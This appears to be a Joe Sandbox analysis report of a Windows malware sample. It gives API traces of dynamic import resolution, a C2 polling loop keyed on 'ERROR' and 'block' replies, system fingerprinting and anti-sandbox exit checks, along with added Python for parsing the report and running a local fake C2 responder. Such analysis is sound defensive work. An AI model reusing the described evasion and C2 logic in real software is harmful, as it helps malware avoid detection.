• Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Similarity
                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                  • String ID: ERROR$ERROR$GET
                  • API String ID: 3749127164-2509457195
                  • Opcode ID: a4d667f865228717da852e9952f27cd9c7cbf4890405dd6fcf656467973063f0
                  • Instruction ID: 23d11f0478cabc9d9867bb3c74eb28b290da24a0795332561ed933a5e6141e24
                  • Opcode Fuzzy Hash: a4d667f865228717da852e9952f27cd9c7cbf4890405dd6fcf656467973063f0
                  • Instruction Fuzzy Hash: B2712F71A00218ABDB14EFE0DC45BEE77BABB44700F108198F54A6B2D0DBB46A85DF95
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006211B7), ref: 00637880
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00637887
                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0063789F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Similarity
                  • API ID: Heap$AllocateNameProcessUser
                  • String ID:
                  • API String ID: 1296208442-0
                  • Opcode ID: 69b3bb4c03802c56e83a3e5d829a0f41e7b158905ca1e5650ff602c780a72bbe
                  • Instruction ID: ad6777341428c48dbd91409c4dda52167fa39c6b8ad40ed6960825a097439cf2
                  • Opcode Fuzzy Hash: 69b3bb4c03802c56e83a3e5d829a0f41e7b158905ca1e5650ff602c780a72bbe
                  • Instruction Fuzzy Hash: 87F04FF1D44209ABC714DF98DD49BAEFBB8FB08711F10026AFA05A3680C7B515048FE1
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Similarity
                  • API ID: ExitInfoProcessSystem
                  • String ID:
                  • API String ID: 752954902-0
                  • Opcode ID: b7240986691fd868937bafd61ef5adc2680f5267b364033dbdb8d3bbcb36591f
                  • Instruction ID: 007dd73b86ac1c07a1f3d61bd0643b4942a4cb24d7952d95efe4d3e90acc7e5d
                  • Opcode Fuzzy Hash: b7240986691fd868937bafd61ef5adc2680f5267b364033dbdb8d3bbcb36591f
                  • Instruction Fuzzy Hash: 0BD05E7490430CDBCB04DFE0D84A6DDBB78FB08311F001594D90572340EA709491CEA6

Control-flow Graph (legend: Executed / Not Executed; graph image not reproduced here). Basic blocks and the API calls they contain; each resolution block is entered or skipped by a conditional in the short block before it:
• 639c10-639c1a: entry
• 639c20-63a031: GetProcAddress × 43
• 63a036-63a0ca: LoadLibraryA × 8
• 63a0cc-63a141: GetProcAddress × 5
• 63a153-63a211: GetProcAddress × 8
• 63a21f-63a293: GetProcAddress × 5
• 63a2a5-63a332: GetProcAddress × 6
• 63a344-63a41a: GetProcAddress × 9
• 63a428-63a49d: GetProcAddress × 5
• 63a4ab-63a4d7: GetProcAddress × 2
• 63a4e5-63a510: GetProcAddress × 2
• 63a522-63a60d: GetProcAddress × 10
• 63a61b-63a678: GetProcAddress × 4
• 63a686-63a699: GetProcAddress
• 63a6a7-63a703: GetProcAddress × 4
• 63a708-63a709: end
                  APIs
                  • GetProcAddress.KERNEL32(75900000,013052C0), ref: 00639C2D
                  • GetProcAddress.KERNEL32(75900000,013052E0), ref: 00639C45
                  • GetProcAddress.KERNEL32(75900000,01319648), ref: 00639C5E
                  • GetProcAddress.KERNEL32(75900000,013195B8), ref: 00639C76
                  • GetProcAddress.KERNEL32(75900000,0131DFF8), ref: 00639C8E
                  • GetProcAddress.KERNEL32(75900000,0131DF08), ref: 00639CA7
                  • GetProcAddress.KERNEL32(75900000,0130B7B0), ref: 00639CBF
                  • GetProcAddress.KERNEL32(75900000,0131DFB0), ref: 00639CD7
                  • GetProcAddress.KERNEL32(75900000,0131E0D0), ref: 00639CF0
                  • GetProcAddress.KERNEL32(75900000,0131E028), ref: 00639D08
                  • GetProcAddress.KERNEL32(75900000,0131DEC0), ref: 00639D20
                  • GetProcAddress.KERNEL32(75900000,01305500), ref: 00639D39
                  • GetProcAddress.KERNEL32(75900000,01305300), ref: 00639D51
                  • GetProcAddress.KERNEL32(75900000,01305340), ref: 00639D69
                  • GetProcAddress.KERNEL32(75900000,01305360), ref: 00639D82
                  • GetProcAddress.KERNEL32(75900000,0131E040), ref: 00639D9A
                  • GetProcAddress.KERNEL32(75900000,0131DE78), ref: 00639DB2
                  • GetProcAddress.KERNEL32(75900000,0130B968), ref: 00639DCB
                  • GetProcAddress.KERNEL32(75900000,013053A0), ref: 00639DE3
                  • GetProcAddress.KERNEL32(75900000,0131DF20), ref: 00639DFB
                  • GetProcAddress.KERNEL32(75900000,0131E010), ref: 00639E14
                  • GetProcAddress.KERNEL32(75900000,0131DE90), ref: 00639E2C
                  • GetProcAddress.KERNEL32(75900000,0131E0E8), ref: 00639E44
                  • GetProcAddress.KERNEL32(75900000,01305440), ref: 00639E5D
                  • GetProcAddress.KERNEL32(75900000,0131E070), ref: 00639E75
                  • GetProcAddress.KERNEL32(75900000,0131E058), ref: 00639E8D
                  • GetProcAddress.KERNEL32(75900000,0131E0B8), ref: 00639EA6
                  • GetProcAddress.KERNEL32(75900000,0131E0A0), ref: 00639EBE
                  • GetProcAddress.KERNEL32(75900000,0131DF50), ref: 00639ED6
                  • GetProcAddress.KERNEL32(75900000,0131E088), ref: 00639EEF
                  • GetProcAddress.KERNEL32(75900000,0131DE48), ref: 00639F07
                  • GetProcAddress.KERNEL32(75900000,0131E100), ref: 00639F1F
                  • GetProcAddress.KERNEL32(75900000,0131E118), ref: 00639F38
                  • GetProcAddress.KERNEL32(75900000,0131B5B8), ref: 00639F50
                  • GetProcAddress.KERNEL32(75900000,0131E130), ref: 00639F68
                  • GetProcAddress.KERNEL32(75900000,0131DFC8), ref: 00639F81
                  • GetProcAddress.KERNEL32(75900000,01305460), ref: 00639F99
                  • GetProcAddress.KERNEL32(75900000,0131DEA8), ref: 00639FB1
                  • GetProcAddress.KERNEL32(75900000,01305480), ref: 00639FCA
                  • GetProcAddress.KERNEL32(75900000,0131DE60), ref: 00639FE2
                  • GetProcAddress.KERNEL32(75900000,0131DED8), ref: 00639FFA
                  • GetProcAddress.KERNEL32(75900000,01304F00), ref: 0063A013
                  • GetProcAddress.KERNEL32(75900000,013050E0), ref: 0063A02B
                  • LoadLibraryA.KERNEL32(0131DEF0,?,00635CA3,00640AEB,?,?,?,?,?,?,?,?,?,?,00640AEA,00640AE3), ref: 0063A03D
                  • LoadLibraryA.KERNEL32(0131DF38,?,00635CA3,00640AEB,?,?,?,?,?,?,?,?,?,?,00640AEA,00640AE3), ref: 0063A04E
                  • LoadLibraryA.KERNEL32(0131DF68,?,00635CA3,00640AEB,?,?,?,?,?,?,?,?,?,?,00640AEA,00640AE3), ref: 0063A060
                  • LoadLibraryA.KERNEL32(0131DF80,?,00635CA3,00640AEB,?,?,?,?,?,?,?,?,?,?,00640AEA,00640AE3), ref: 0063A072
                  • LoadLibraryA.KERNEL32(0131DF98,?,00635CA3,00640AEB,?,?,?,?,?,?,?,?,?,?,00640AEA,00640AE3), ref: 0063A083
                  • LoadLibraryA.KERNEL32(0131DFE0,?,00635CA3,00640AEB,?,?,?,?,?,?,?,?,?,?,00640AEA,00640AE3), ref: 0063A095
                  • LoadLibraryA.KERNEL32(0131E430,?,00635CA3,00640AEB,?,?,?,?,?,?,?,?,?,?,00640AEA,00640AE3), ref: 0063A0A7
                  • LoadLibraryA.KERNEL32(0131E148,?,00635CA3,00640AEB,?,?,?,?,?,?,?,?,?,?,00640AEA,00640AE3), ref: 0063A0B8
                  • GetProcAddress.KERNEL32(75FD0000,01305080), ref: 0063A0DA
                  • GetProcAddress.KERNEL32(75FD0000,0131E160), ref: 0063A0F2
                  • GetProcAddress.KERNEL32(75FD0000,01319230), ref: 0063A10A
                  • GetProcAddress.KERNEL32(75FD0000,0131E3E8), ref: 0063A123
                  • GetProcAddress.KERNEL32(75FD0000,01305140), ref: 0063A13B
                  • GetProcAddress.KERNEL32(73530000,0130B620), ref: 0063A160
                  • GetProcAddress.KERNEL32(73530000,01305040), ref: 0063A179
                  • GetProcAddress.KERNEL32(73530000,0130B698), ref: 0063A191
                  • GetProcAddress.KERNEL32(73530000,0131E250), ref: 0063A1A9
                  • GetProcAddress.KERNEL32(73530000,0131E310), ref: 0063A1C2
                  • GetProcAddress.KERNEL32(73530000,01304E00), ref: 0063A1DA
                  • GetProcAddress.KERNEL32(73530000,01305020), ref: 0063A1F2
                  • GetProcAddress.KERNEL32(73530000,0131E328), ref: 0063A20B
                  • GetProcAddress.KERNEL32(763B0000,01304DC0), ref: 0063A22C
                  • GetProcAddress.KERNEL32(763B0000,01305100), ref: 0063A244
                  • GetProcAddress.KERNEL32(763B0000,0131E400), ref: 0063A25D
                  • GetProcAddress.KERNEL32(763B0000,0131E178), ref: 0063A275
                  • GetProcAddress.KERNEL32(763B0000,01305120), ref: 0063A28D
                  • GetProcAddress.KERNEL32(750F0000,0130B878), ref: 0063A2B3
                  • GetProcAddress.KERNEL32(750F0000,0130B918), ref: 0063A2CB
                  • GetProcAddress.KERNEL32(750F0000,0131E2C8), ref: 0063A2E3
                  • GetProcAddress.KERNEL32(750F0000,01305060), ref: 0063A2FC
                  • GetProcAddress.KERNEL32(750F0000,01304FE0), ref: 0063A314
                  • GetProcAddress.KERNEL32(750F0000,0130B738), ref: 0063A32C
                  • GetProcAddress.KERNEL32(75A50000,0131E388), ref: 0063A352
                  • GetProcAddress.KERNEL32(75A50000,01304F20), ref: 0063A36A
                  • GetProcAddress.KERNEL32(75A50000,01319240), ref: 0063A382
                  • GetProcAddress.KERNEL32(75A50000,0131E3A0), ref: 0063A39B
                  • GetProcAddress.KERNEL32(75A50000,0131E208), ref: 0063A3B3
                  • GetProcAddress.KERNEL32(75A50000,01304F80), ref: 0063A3CB
                  • GetProcAddress.KERNEL32(75A50000,01304E40), ref: 0063A3E4
                  • GetProcAddress.KERNEL32(75A50000,0131E220), ref: 0063A3FC
                  • GetProcAddress.KERNEL32(75A50000,0131E280), ref: 0063A414
                  • GetProcAddress.KERNEL32(75070000,01304E20), ref: 0063A436
                  • GetProcAddress.KERNEL32(75070000,0131E190), ref: 0063A44E
                  • GetProcAddress.KERNEL32(75070000,0131E1A8), ref: 0063A466
                  • GetProcAddress.KERNEL32(75070000,0131E340), ref: 0063A47F
                  • GetProcAddress.KERNEL32(75070000,0131E1F0), ref: 0063A497
                  • GetProcAddress.KERNEL32(74E50000,013050A0), ref: 0063A4B8
                  • GetProcAddress.KERNEL32(74E50000,013050C0), ref: 0063A4D1
                  • GetProcAddress.KERNEL32(75320000,01305160), ref: 0063A4F2
                  • GetProcAddress.KERNEL32(75320000,0131E2B0), ref: 0063A50A
                  • GetProcAddress.KERNEL32(6F060000,01304E60), ref: 0063A530
                  • GetProcAddress.KERNEL32(6F060000,01304F60), ref: 0063A548
                  • GetProcAddress.KERNEL32(6F060000,01305180), ref: 0063A560
                  • GetProcAddress.KERNEL32(6F060000,0131E1D8), ref: 0063A579
                  • GetProcAddress.KERNEL32(6F060000,01304EE0), ref: 0063A591
                  • GetProcAddress.KERNEL32(6F060000,01304F40), ref: 0063A5A9
                  • GetProcAddress.KERNEL32(6F060000,01304FA0), ref: 0063A5C2
                  • GetProcAddress.KERNEL32(6F060000,01304DA0), ref: 0063A5DA
                  • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0063A5F1
                  • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0063A607
                  • GetProcAddress.KERNEL32(74E00000,0131E298), ref: 0063A629
                  • GetProcAddress.KERNEL32(74E00000,013190A0), ref: 0063A641
                  • GetProcAddress.KERNEL32(74E00000,0131E1C0), ref: 0063A659
                  • GetProcAddress.KERNEL32(74E00000,0131E2E0), ref: 0063A672
                  • GetProcAddress.KERNEL32(74DF0000,01304DE0), ref: 0063A693
                  • GetProcAddress.KERNEL32(6D070000,0131E3B8), ref: 0063A6B4
                  • GetProcAddress.KERNEL32(6D070000,01304E80), ref: 0063A6CD
                  • GetProcAddress.KERNEL32(6D070000,0131E238), ref: 0063A6E5
                  • GetProcAddress.KERNEL32(6D070000,0131E358), ref: 0063A6FD
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: HttpQueryInfoA$InternetSetOptionA
                  • API String ID: 2238633743-1775429166
                  • Opcode ID: a0a2b80014968d20d727e44e16c8785fc636c835520c4a13d90a17e941de7e87
                  • Instruction ID: 8117ffb0f1df4338897c8e912584821380e5e70090116de013b62d1161939755
                  • Opcode Fuzzy Hash: a0a2b80014968d20d727e44e16c8785fc636c835520c4a13d90a17e941de7e87
                  • Instruction Fuzzy Hash: 656242B5500200AFC34CDFA8FE9896637F9F74C701716A51AE645E3324DBB9A841DF52
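The function above is the sample's import resolver: 104 GetProcAddress calls spread over 13 module handles, with one handle (75900000) obtained before this function and eight more DLLs brought in by LoadLibraryA midway. Only two of the name arguments (InternetSetOptionA, HttpQueryInfoA) are rendered as strings; the rest are pointers into the image, so the PE import table says little and the real import set has to be recovered from this call trace. The following Python is an added example and not part of the Joe Sandbox report or of the sample: it parses the report's "• API.MODULE(args), ref: ADDR" lines into records, counts GetProcAddress resolutions per module handle, lists the resolutions whose symbol name is visible, and flags a function as a runtime import resolver above a threshold. The sample lines are copied from this function's API list plus one "Part of subcall function" line from a later function; the threshold, the record type and all function names are my own choices.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional

# One API line as rendered in the report, for example:
#   • GetProcAddress.KERNEL32(75900000,013052C0), ref: 00639C2D
#   • ExitProcess.KERNEL32 ref: 006317D1
#   • Part of subcall function 0063A820: lstrlen.KERNEL32(00624F05,?), ref: 0063A82B
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX32_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

# Constructed input: lines copied from the report (the first eight from the
# resolver above, then one subcall line and one ExitProcess line from later functions).
SAMPLE_LINES = """\
• GetProcAddress.KERNEL32(75900000,013052C0), ref: 00639C2D
• GetProcAddress.KERNEL32(75900000,013052E0), ref: 00639C45
• GetProcAddress.KERNEL32(75900000,01319648), ref: 00639C5E
• LoadLibraryA.KERNEL32(0131DEF0,?,00635CA3,00640AEB,?,?,?,?,?,?,?,?,?,?,00640AEA,00640AE3), ref: 0063A03D
• LoadLibraryA.KERNEL32(0131DF38,?,00635CA3,00640AEB,?,?,?,?,?,?,?,?,?,?,00640AEA,00640AE3), ref: 0063A04E
• GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0063A5F1
• GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0063A607
• GetProcAddress.KERNEL32(74DF0000,01304DE0), ref: 0063A693
• Part of subcall function 0063A820: lstrlen.KERNEL32(00624F05,?,?,00624F05,00640DDE), ref: 0063A82B
• ExitProcess.KERNEL32 ref: 006317D1
""".splitlines()


@dataclass(frozen=True)
class ApiCall:
    api: str                # e.g. GetProcAddress
    module: str             # e.g. KERNEL32
    args: tuple             # raw argument strings as shown; "?" means unknown
    ref: str                # call-site address
    subcall: Optional[str]  # address of the subcall the line belongs to, if any


def parse_api_lines(lines) -> List[ApiCall]:
    """Parse report API lines; lines that do not match the pattern are skipped."""
    calls = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             m.group("ref").upper(), m.group("sub")))
    return calls


def summarize(calls: List[ApiCall]) -> dict:
    """Count calls per API and GetProcAddress calls per module handle, and list
    the resolutions whose name argument is shown as a string rather than as a
    pointer (only those reveal the imported symbol directly)."""
    by_api = Counter(c.api for c in calls)
    by_handle = Counter()
    named = []
    for c in calls:
        if c.api != "GetProcAddress" or len(c.args) < 2:
            continue
        handle, name = c.args[0], c.args[1]
        by_handle[handle] += 1
        if name != "?" and not HEX32_RE.match(name):
            named.append((handle, name))
    return {"by_api": by_api, "by_handle": by_handle, "named": named}


def is_dynamic_resolver(calls: List[ApiCall], min_resolutions: int = 20) -> bool:
    """Triage heuristic (threshold is an assumption): a single function that
    resolves at least min_resolutions symbols via GetProcAddress is building
    its own import table at runtime."""
    return summarize(calls)["by_api"]["GetProcAddress"] >= min_resolutions


if __name__ == "__main__":
    s = summarize(parse_api_lines(SAMPLE_LINES))
    for handle, n in sorted(s["by_handle"].items(), key=lambda kv: -kv[1]):
        print(f"handle {handle}: {n} resolutions")
    print("named resolutions:", s["named"])
```

Run over the full API list of this function the per-handle counts are 43, 5, 8, 5, 6, 9, 5, 2, 2, 10, 4, 1 and 4 (104 in total), and handle 6F060000 is the only one with visible names, both of them WinINet exports.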

Control-flow Graph (legend: Executed / Not Executed; graph image not reproduced here). The graph is three rounds of the same shape:
• 635510-635577: entry; calls 635ad0, 63a820 × 3, 63a740 × 4; then the loop head 63557c-635583
• each round picks one of two request-building arms (calls to 63a740 × 2, 621590, 6352c0, 63a8a0, 63a800, 63aad0 with StrCmpCA at 635644 / 63578b / 635940, or calls to 63a820, 63a7a0, 621590, 6351f0, 63a8a0, 63a800), then calls 63aad0 and compares the reply with StrCmpCA (refs 6356a1, 635857, 635a0c)
• one outcome of each compare leaves through 6357dc-635844, 635991-6359f9 or 635a28-635a91 (calls 63a8a0, 63a820 × 2, 621670, 63a800 × 4, 636560, 621550) to the final block 635ac3-635ac6
• the other outcome continues to the next round; after the third compare it is 635a16-635a21: Sleep, then back to the loop head 63557c
                  APIs
                    • Part of subcall function 0063A820: lstrlen.KERNEL32(00624F05,?,?,00624F05,00640DDE), ref: 0063A82B
                    • Part of subcall function 0063A820: lstrcpy.KERNEL32(00640DDE,00000000), ref: 0063A885
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00635644
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006356A1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00635857
                    • Part of subcall function 0063A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0063A7E6
                    • Part of subcall function 006351F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00635228
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                    • Part of subcall function 006352C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00635318
                    • Part of subcall function 006352C0: lstrlen.KERNEL32(00000000), ref: 0063532F
                    • Part of subcall function 006352C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00635364
                    • Part of subcall function 006352C0: lstrlen.KERNEL32(00000000), ref: 00635383
                    • Part of subcall function 006352C0: lstrlen.KERNEL32(00000000), ref: 006353AE
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0063578B
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00635940
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00635A0C
                  • Sleep.KERNEL32(0000EA60), ref: 00635A1B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Similarity
                  • API ID: lstrcpylstrlen$Sleep
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 507064821-2791005934
                  • Opcode ID: 7bbe5549b0a65cc9f31af3f1e504cb1850567ffac4f5bbb1109d09d4df782e0d
                  • Instruction ID: 0652da9d5d9112dbe69886ee24855001acdc4c9d06650f9fd2a5d0cdd2e65a14
                  • Opcode Fuzzy Hash: 7bbe5549b0a65cc9f31af3f1e504cb1850567ffac4f5bbb1109d09d4df782e0d
                  • Instruction Fuzzy Hash: 95E13F72910104AACB58FBE0EC96AED737ABF54300F50812CF54767191EF746A09DBE6

Control-flow Graph (legend: Executed / Not Executed; graph image not reproduced here). Basic blocks:
• 6317a0-6317cd: call 63aad0, then StrCmpCA (ref 6317c5) against "block"
• 6317cf-6317d1: ExitProcess, reached from one outcome of that compare
• 6317d7-6317f1: call 63aad0; 6317f4-6317f8 and 6317fe-631811: loop head and entry test
• 631817-63181a: dispatch into nine StrCmpCA blocks (63185d, 63187f, 6318ad, 6318cf, 6318f1, 631913, 631932, 631951, 631970) and four blocks that call 63a820 (631821, 631835, 631849, 63198f)
• 63199e-6319bd: back to 6317f4
• 6319c2-6319cd: call 63a800, end
                  APIs
                  • StrCmpCA.SHLWAPI(00000000,block), ref: 006317C5
                  • ExitProcess.KERNEL32 ref: 006317D1
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Similarity
                  • API ID: ExitProcess
                  • String ID: block
                  • API String ID: 621844428-2199623458
                  • Opcode ID: 87ad121bb3488ca5189bc1cd819d313c41b7b6eaa3da1b8af2c6306cf0920c60
                  • Instruction ID: 7e03183847f7bf41e02457d55106a32fb3fbc60254bfeba26648b5e0347bafdd
                  • Opcode Fuzzy Hash: 87ad121bb3488ca5189bc1cd819d313c41b7b6eaa3da1b8af2c6306cf0920c60
                  • Instruction Fuzzy Hash: A05188B4A04209EFDB04DFA4D964BBE77B6BF45304F109058E806AB380D770E956DBA2
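Two reply checks in the two functions above matter to anyone running this sample against a sinkhole. The request loop at 635510 compares each reply with "ERROR" via StrCmpCA and, on the matching outcome, calls Sleep(0xEA60) (60 seconds) and returns to the loop head 63557c; the handler at 6317a0 compares the reply with "block" and has ExitProcess on one branch of that compare (reading this as "exit when the reply is block" is an inference from the graph, not something the report states). A fake C2 that answers "ERROR" therefore only produces a sleep loop, and one that answers "block" ends the process before any later stage runs. The following Python is an added example, not code from the report or from the sample: a minimal local HTTP responder whose body is chosen per experiment and records what the client sent, plus a function that models the two observed checks (the meaning of any other reply body is not shown on this page). The host, port, path and every function and class name are assumptions.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


def classify_c2_reply(body: bytes) -> str:
    """Model of the two checks visible in the report. StrCmpCA is a
    case-sensitive ANSI compare, so the match must be exact."""
    text = body.decode("latin-1")
    if text == "block":
        return "exit"     # 6317a0: compare against "block", ExitProcess on one branch
    if text == "ERROR":
        return "retry"    # 635510 loop: Sleep(0xEA60) and back to 63557c
    return "proceed"      # any other body: next stage (format not shown on this page)


class FakeC2Handler(BaseHTTPRequestHandler):
    """Answers every GET/POST with a fixed body and logs the request."""
    reply = b"ERROR"      # overridden per experiment by start_fake_c2()
    requests = []         # (method, path, payload) tuples seen by this server

    def _handle(self):
        length = int(self.headers.get("Content-Length") or 0)
        payload = self.rfile.read(length) if length else b""
        type(self).requests.append((self.command, self.path, payload))
        body = type(self).reply
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    do_GET = _handle
    do_POST = _handle

    def log_message(self, *_args):  # keep the console quiet
        pass


def start_fake_c2(reply: bytes, host: str = "127.0.0.1", port: int = 0):
    """Start a responder on a background thread; port 0 picks a free port.
    Returns the server and the per-experiment handler class (with its log)."""
    handler = type("ExperimentHandler", (FakeC2Handler,),
                   {"reply": reply, "requests": []})
    server = HTTPServer((host, port), handler)
    threading.Thread(target=server.serve_forever,
                     kwargs={"poll_interval": 0.05}, daemon=True).start()
    return server, handler


def probe(server, path: str = "/") -> bytes:
    """Stand-in for the sample's HttpSendRequest/InternetReadFile round trip."""
    host, port = server.server_address[:2]
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("GET", path)
        return conn.getresponse().read()
    finally:
        conn.close()


def run_experiment(reply: bytes, path: str = "/"):
    """Serve one reply, fetch it once, classify it, and return the request log."""
    server, handler = start_fake_c2(reply)
    try:
        return classify_c2_reply(probe(server, path)), list(handler.requests)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for reply in (b"ERROR", b"block", b"anything else"):
        outcome, seen = run_experiment(reply, "/ping")
        print(f"reply {reply!r}: sample would {outcome}; requests seen: {seen}")
```

To use it against the real sample, redirect its C2 host to the responder (hosts file or DNS in the analysis network) and start with a body that is neither "ERROR" nor "block"; because StrCmpCA is case-sensitive, a lowercase "error" does not take the sleep path.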

Control-flow Graph (legend: Executed / Not Executed; graph image not reproduced here). Basic blocks:
• 637500-63754a: GetWindowsDirectoryA (63754c: short alternate block on one outcome)
• 637553-6375c7: GetVolumeInformationA; call 638d00 × 3
• 6375d8-6375df and 6375e1-6375fa: loop calling 638d00
• 6375fc-637617: GetProcessHeap, RtlAllocateHeap
• 637619-637626: call 63a740, or 637628-637658: wsprintfA then call 63a740
• 63767e-63768e: end
                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00637542
                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0063757F
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00637603
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0063760A
                  • wsprintfA.USER32 ref: 00637640
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                  • String ID: :$C$\$d
                  • API String ID: 1544550907-3640471262
                  • Opcode ID: 262cd8ec6d0ffb8eb0f0fa8eced2af6ee1d4e11f3f6464f6e1ea445e0eb551a4
                  • Instruction ID: 5cc0f7776230d67582bd84c139e20bb5de01c41f719d6141fb6591100b7840f1
                  • Opcode Fuzzy Hash: 262cd8ec6d0ffb8eb0f0fa8eced2af6ee1d4e11f3f6464f6e1ea445e0eb551a4
                  • Instruction Fuzzy Hash: A2417EF1D04248ABDB24DB94DC85BEEBBB9AF18710F100199F50967280DB74AA44CFA5

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00639860: GetProcAddress.KERNEL32(75900000,01310EA0), ref: 006398A1
                    • Part of subcall function 00639860: GetProcAddress.KERNEL32(75900000,01310C30), ref: 006398BA
                    • Part of subcall function 00639860: GetProcAddress.KERNEL32(75900000,01310CD8), ref: 006398D2
                    • Part of subcall function 00639860: GetProcAddress.KERNEL32(75900000,01310BE8), ref: 006398EA
                    • Part of subcall function 00639860: GetProcAddress.KERNEL32(75900000,01310C00), ref: 00639903
                    • Part of subcall function 00639860: GetProcAddress.KERNEL32(75900000,013191E0), ref: 0063991B
                    • Part of subcall function 00639860: GetProcAddress.KERNEL32(75900000,01305540), ref: 00639933
                    • Part of subcall function 00639860: GetProcAddress.KERNEL32(75900000,013051A0), ref: 0063994C
                    • Part of subcall function 00639860: GetProcAddress.KERNEL32(75900000,01310C48), ref: 00639964
                    • Part of subcall function 00639860: GetProcAddress.KERNEL32(75900000,01310C60), ref: 0063997C
                    • Part of subcall function 00639860: GetProcAddress.KERNEL32(75900000,01310C78), ref: 00639995
                    • Part of subcall function 00639860: GetProcAddress.KERNEL32(75900000,01310D20), ref: 006399AD
                    • Part of subcall function 00639860: GetProcAddress.KERNEL32(75900000,01305520), ref: 006399C5
                    • Part of subcall function 00639860: GetProcAddress.KERNEL32(75900000,01310D38), ref: 006399DE
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 006211D0: ExitProcess.KERNEL32 ref: 00621211
                    • Part of subcall function 00621160: GetSystemInfo.KERNEL32(?), ref: 0062116A
                    • Part of subcall function 00621160: ExitProcess.KERNEL32 ref: 0062117E
                    • Part of subcall function 00621110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0062112B
                    • Part of subcall function 00621110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00621132
                    • Part of subcall function 00621110: ExitProcess.KERNEL32 ref: 00621143
                    • Part of subcall function 00621220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0062123E
                    • Part of subcall function 00621220: __aulldiv.LIBCMT ref: 00621258
                    • Part of subcall function 00621220: __aulldiv.LIBCMT ref: 00621266
